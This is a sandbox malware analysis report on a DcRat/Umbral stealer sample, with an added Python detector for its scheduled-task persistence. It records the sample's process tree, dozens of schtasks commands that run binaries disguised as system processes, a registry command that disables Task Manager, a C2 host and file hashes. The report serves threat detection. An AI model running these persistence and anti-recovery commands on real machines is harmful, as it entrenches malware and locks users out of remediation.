Malware Analysis Report

2024-10-10 10:09

Sample ID 240503-xvxbwadd8s
Target 898A94F29EDC228CE3BD2054F3D5D6DD.exe
SHA256 a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37
Tags: dcrat umbral evasion infostealer rat stealer execution spyware
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256: a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37

Threat Level: Known bad

The file 898A94F29EDC228CE3BD2054F3D5D6DD.exe was found to be: Known bad.

Malicious Activity Summary

dcrat umbral evasion infostealer rat stealer execution spyware

DcRat

Umbral

Detect Umbral payload

Process spawned unexpected child process

DCRat payload

Disables Task Manager via registry modification

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Executes dropped EXE

Reads user/profile data of web browsers

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Creates scheduled task(s)

Views/modifies file attributes

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Detects videocard installed

Suspicious use of AdjustPrivilegeToken

Modifies registry key

Suspicious behavior: GetForegroundWindowSpam

Runs ping.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-03 19:11

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-03 19:11

Reported

2024-05-03 19:13

Platform

win7-20240221-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe"

Signatures

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A (reported 14 times)
Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A (reported 40 times)

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A (reported 3 times)

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe (reported 54 times)

Umbral

stealer umbral

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A (reported 5 times)

Disables Task Manager via registry modification

evasion

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Microsoft Synchronization Services\088424020bedd6 C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files\DVD Maker\ja-JP\Inject.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files\DVD Maker\ja-JP\652d253fe21f9b C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files\Common Files\csrss.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files\Common Files\886983d96e3d3e C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files\Uninstall Information\csrss.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files\Uninstall Information\886983d96e3d3e C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files (x86)\Microsoft Synchronization Services\conhost.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\en-US\24dbde2999530e C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Windows\schemas\driverBrokercommon.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Windows\schemas\1cdec3972599ff C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Windows\AppPatch\es-ES\explorer.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Windows\AppPatch\es-ES\7a0fd90576e088 C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Windows\en-US\WmiPrvSE.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A (reported 54 times)

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A (reported 13 times)
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A (reported 51 times)

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
(the C:\Windows\System32\Wbem\wmic.exe token rows above are reported a second time with identical values)
Token: SeDebugPrivilege N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
Token: SeDebugPrivilege N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2236 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe C:\Users\Admin\AppData\Local\Temp\stealer.exe (reported 4 times)
PID 2236 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe C:\Users\Admin\AppData\Local\Temp\чекер dc.exe (reported 4 times)
PID 2236 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe C:\Users\Admin\AppData\Local\Temp\Inject.exe (reported 4 times)
PID 2592 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\чекер dc.exe C:\Windows\SysWOW64\WScript.exe (reported 4 times)
PID 2492 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\Wbem\wmic.exe (reported 3 times)
PID 2648 wrote to memory of 2388 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe (reported 4 times)
PID 2388 wrote to memory of 2692 N/A C:\Windows\SysWOW64\cmd.exe C:\MsWinsessiondllNet\driverBrokercommon.exe (reported 4 times)
PID 2692 wrote to memory of 2312 N/A C:\MsWinsessiondllNet\driverBrokercommon.exe C:\Windows\System32\cmd.exe (reported 3 times)
PID 2312 wrote to memory of 1248 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe (reported 3 times)
PID 2388 wrote to memory of 2832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe (reported 4 times)
PID 2312 wrote to memory of 1976 N/A C:\Windows\System32\cmd.exe C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe (reported 3 times)
PID 1976 wrote to memory of 2280 N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe C:\Windows\System32\WScript.exe (reported 3 times)
PID 1976 wrote to memory of 3068 N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe C:\Windows\System32\WScript.exe (reported 3 times)

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe

"C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe"

C:\Users\Admin\AppData\Local\Temp\stealer.exe

"C:\Users\Admin\AppData\Local\Temp\stealer.exe"

C:\Users\Admin\AppData\Local\Temp\чекер dc.exe

"C:\Users\Admin\AppData\Local\Temp\чекер dc.exe"

C:\Users\Admin\AppData\Local\Temp\Inject.exe

"C:\Users\Admin\AppData\Local\Temp\Inject.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat" "

C:\MsWinsessiondllNet\driverBrokercommon.exe

"C:\MsWinsessiondllNet\driverBrokercommon.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 11 /tr "'C:\Users\Public\taskhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Users\Public\taskhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 6 /tr "'C:\Users\Public\taskhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Program Files\Uninstall Information\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Program Files\Uninstall Information\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Windows\AppPatch\es-ES\explorer.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\AppPatch\es-ES\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Windows\AppPatch\es-ES\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\cmd.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 12 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsml" /sc MINUTE /mo 8 /tr "'C:\MsWinsessiondllNet\lsm.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\lsm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsml" /sc MINUTE /mo 5 /tr "'C:\MsWinsessiondllNet\lsm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Windows\en-US\WmiPrvSE.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\en-US\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Windows\en-US\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 7 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\wininit.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "InjectI" /sc MINUTE /mo 7 /tr "'C:\Program Files\DVD Maker\ja-JP\Inject.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Inject" /sc ONLOGON /tr "'C:\Program Files\DVD Maker\ja-JP\Inject.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "InjectI" /sc MINUTE /mo 13 /tr "'C:\Program Files\DVD Maker\ja-JP\Inject.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Common Files\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Common Files\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Program Files\Common Files\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\services.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\MsWinsessiondllNet\explorer.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 12 /tr "'C:\MsWinsessiondllNet\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Users\Public\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Public\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Users\Public\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 7 /tr "'C:\MsWinsessiondllNet\dwm.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\dwm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 5 /tr "'C:\MsWinsessiondllNet\dwm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "driverBrokercommond" /sc MINUTE /mo 6 /tr "'C:\Windows\schemas\driverBrokercommon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "driverBrokercommon" /sc ONLOGON /tr "'C:\Windows\schemas\driverBrokercommon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "driverBrokercommond" /sc MINUTE /mo 12 /tr "'C:\Windows\schemas\driverBrokercommon.exe'" /rl HIGHEST /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eSeckPEt0m.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
(Not a time-sync step: sampling localhost twice at a five-second period makes w32tm act as a roughly five-second sleep inside the batch file, a stand-in for timeout.exe or ping.exe.)

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe

"C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f3ee51fa-6ca5-405c-bf99-9cf2f55fcb50.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9a182fe7-568d-414b-951d-25d6244808b7.vbs"
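
The 54 schtasks.exe invocations above follow one template per dropped binary: a MINUTE task without a run level, an ONLOGON task with /rl HIGHEST, and a second MINUTE task with /rl HIGHEST. The minute tasks are named after the binary with its own first letter appended (taskhost becomes taskhostt, WmiPrvSE becomes WmiPrvSEW), the logon task takes the bare name, and the targets borrow system-process names in directories where those binaries never live (C:\Recovery\..., C:\Program Files\Uninstall Information, C:\Windows\en-US). The Python below is an added example, not part of this report or of any analysis tooling, that parses such command lines and flags those tells. The SYSTEM_BINARIES and SYSTEM_DIRS sets, the flag names and the NightlyBackup control line are the author's assumptions, and the sample input is a constructed subset of the lines above.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample input: a few of the schtasks command lines recorded in the process
# list above, plus one made-up benign task as a control. All 54 lines parse the same way.
SAMPLE_CMDLINES = [
    r'''schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 11 /tr "'C:\Users\Public\taskhost.exe'" /f''',
    r'''schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Users\Public\taskhost.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 6 /tr "'C:\Users\Public\taskhost.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Program Files\Uninstall Information\csrss.exe'" /f''',
    r'''schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\lsass.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Windows\en-US\WmiPrvSE.exe'" /rl HIGHEST /f''',
    # constructed benign control: ordinary name, daily schedule, no run-level request
    r'''schtasks.exe /create /tn "NightlyBackup" /sc DAILY /st 02:00 /tr "'C:\Program Files\Backup\backup.exe'" /f''',
]

# Assumed list of Windows binaries whose only legitimate home is a system directory.
# A file with one of these names anywhere else is masquerading.
SYSTEM_BINARIES = {
    "csrss", "lsass", "dllhost", "conhost", "explorer", "wininit", "services", "dwm",
    "wmiprvse", "taskhost", "lsm", "cmd", "spoolsv", "runtimebroker", "textinputhost",
    "svchost", "winlogon", "smss",
}
SYSTEM_DIRS = {r"c:\windows", r"c:\windows\system32", r"c:\windows\syswow64",
               r"c:\windows\system32\wbem"}

TASK_RE = re.compile(
    r'/tn\s+"(?P<name>[^"]+)"'                 # task name
    r'.*?/sc\s+(?P<sched>\w+)'                 # schedule type (MINUTE, ONLOGON, DAILY, ...)
    r'(?:\s+/mo\s+(?P<mod>\d+))?'              # modifier: run every N units
    r'.*?/tr\s+"\'?(?P<target>[^"\']+)\'?"'    # program to run; DcRat wraps it in single quotes
    r'(?:.*?/rl\s+(?P<level>\w+))?',           # run level; HIGHEST asks for the elevated token
    re.IGNORECASE,
)


def parse_task(cmdline):
    """Fields of one `schtasks /create` command line, or None if it is not one."""
    if "/create" not in cmdline.lower():
        return None
    m = TASK_RE.search(cmdline)
    if not m:
        return None
    target = PureWindowsPath(m["target"])
    return {
        "name": m["name"],
        "schedule": m["sched"].upper(),
        "every_min": int(m["mod"]) if m["mod"] else None,
        "target": str(target),
        "stem": target.stem,
        "parent": str(target.parent),
        "level": m["level"].upper() if m["level"] else None,
    }


def flag_task(task):
    """Return the list of tells a parsed task exhibits (empty for a benign task)."""
    flags = []
    stem = task["stem"]
    if stem.lower() in SYSTEM_BINARIES and task["parent"].lower() not in SYSTEM_DIRS:
        flags.append("masquerade")    # system-binary name outside its real directory
    if stem and task["name"].lower() == (stem + stem[0]).lower():
        flags.append("dcrat_name")    # task name = binary name + its own first letter
    if task["level"] == "HIGHEST":
        flags.append("elevated")
    if task["schedule"] == "MINUTE" and task["every_min"] is not None and task["every_min"] <= 15:
        flags.append("watchdog")      # relaunched every few minutes so a killed payload returns
    return flags


def analyze(cmdlines):
    out = []
    for line in cmdlines:
        task = parse_task(line)
        if task:
            task["flags"] = flag_task(task)
            out.append(task)
    return out


def suspicious(cmdlines):
    """Tasks that either masquerade as a system binary or carry the DcRat naming tell."""
    return [t for t in analyze(cmdlines) if {"masquerade", "dcrat_name"} & set(t["flags"])]


if __name__ == "__main__":
    for t in analyze(SAMPLE_CMDLINES):
        print(f'{t["name"]:14} {t["schedule"]:8} {t["target"]:70} {",".join(t["flags"]) or "-"}')
```

Feed it the CommandLine field of Sysmon event 1 or Security 4688 records for schtasks.exe; a task that scores masquerade together with watchdog or elevated is one to delete, and its target path is the file to acquire.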

Network

Country Destination Domain Proto
US 8.8.8.8:53 gstatic.com udp
GB 216.58.201.99:443 gstatic.com tcp
US 8.8.8.8:53 a0947008.xsph.ru udp
RU 141.8.192.103:80 a0947008.xsph.ru tcp (×24: the original table lists this row 24 times)

After the initial reachability check against gstatic.com, every flow goes to one host, a0947008.xsph.ru, over unencrypted HTTP on port 80; repeated short-lived connections to a single third-party host on plain HTTP are the beaconing pattern to hunt for with this family.

Files

memory/2236-0-0x0000000000400000-0x000000000084E000-memory.dmp

\Users\Admin\AppData\Local\Temp\stealer.exe

MD5 8cc1e7cf94fec9bc505ce7411aa28861
SHA1 08703de84f3db427c368f16c873664d78bd83264
SHA256 cc60087c94ea0ab843dcae2cdd76ac5e9c90599d2909bbba12881babf46158ba
SHA512 fe60f11452c9e470c0b63385cf0ee8f9fd07598c1294ba25cc8c7c093142efe865aba39680ae5f80611db9423717a7094c939f180e5195e7ae91a9633872a423

\Users\Admin\AppData\Local\Temp\чекер dc.exe

MD5 6216b6bef94c09a40bfa263809b1ae56
SHA1 a928120e65199c6aaae6c991aa0466f3f8b06020
SHA256 eabc7e4491961469ccb9c8cd716dbaf5285ecb8ad3edfc6bfec133a1ec80f05b
SHA512 0e311738b5bdf73f01c552b59646485418ab5b99862af5da2bb934d4262307ac8f57274bbd7f6c99376e6be99d424aad5282a73a063529310425666be224d215

\Users\Admin\AppData\Local\Temp\Inject.exe

MD5 d428ddd1b0ce85a6c96765aeaf246320
SHA1 d100efdaab5b2ad851fe75a28d0aa95deb920926
SHA256 453a331db812ed6e0ce6cca5d3b5be26e66c44b5f6fbdc88f98442670b8daecb
SHA512 3f9dda9d998ef282eb31644296ef0617bbf40352189f4ccd744191f466e932ffde2fd2bdaebe89f0bc06e465d57a8e46e08b3001fe834b3d989fc71125d25899

memory/2516-19-0x000000013FE90000-0x000000013FEBA000-memory.dmp

memory/2492-21-0x0000000000180000-0x00000000001C0000-memory.dmp

C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe

MD5 7c9bb5fda146efee5ee4a243d6e404b0
SHA1 c2fb82a9efb3a2469e6a120ac4781a7fe26eb3dd
SHA256 1d4b4c4da6c16a2701cec1c24ff21168d26d4f81c0ac8b3e30ed01b8468d488b
SHA512 797e74b283e74a3282223d8035408d55269e4451a289e3873ea197624985121c87dccdbdef42ff99fd8b4d1fd7e856388444e3fc699a9d6b061499682a043771

C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat

MD5 ea70d7b0f1a8a1ff2d246efbdcfe1001
SHA1 252e762aee8fcc5761e17bb84aa3af8276852f5c
SHA256 1947411b5329e6db696c2354b56290b82aaf58b5f5d75fd4f3315fbe27999e31
SHA512 1fd28c415177644e069ded3e0ab3d27105fdac2d76f1060abb127e1961f310c81559e4c1213e61a7f32583cee9f4560106cafc88f0f20cf470edb756aadbec86

\MsWinsessiondllNet\driverBrokercommon.exe

MD5 d84e590c3715c79dc5b92c435957d162
SHA1 2901580903e4b356448d9fe7bea510261e655363
SHA256 d81c1097d231fdcb536974ef025f230d1c4091bab3edcf4f9da9344b44b638ba
SHA512 b797cdb43776a7e8a19f9c93299857d8f88651e13c7ba5ddb57f0ac0b24c7b98e6cc6c20ae1561948fb49774edad31cd237f40c9c690d34923ffee56bc02a485

memory/2692-36-0x0000000000D90000-0x0000000000FDA000-memory.dmp

memory/2692-37-0x0000000000140000-0x0000000000148000-memory.dmp

memory/2692-38-0x0000000000150000-0x0000000000158000-memory.dmp

